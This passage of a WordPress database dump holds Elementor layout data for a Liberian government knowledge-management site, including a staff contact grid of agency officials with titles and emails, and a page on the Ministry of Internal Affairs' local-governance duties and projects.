href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24036,1610,'_last_editor_used_jetpack','classic-editor'),(24037,3524,'_wp_attached_file','2019/11/MIA.png'),(24038,3524,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2019/11/MIA.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"MIA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MIA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"MIA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24039,3525,'_elementor_edit_mode','builder'),(24040,3525,'_elementor_template_type','wp-post'),(24041,3525,'_elementor_version','2.7.5'),(24042,3525,'_wp_page_template','default'),(24043,3525,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"177453a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"182afa84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"375dd5cc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"78a5b2a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mia\\\" 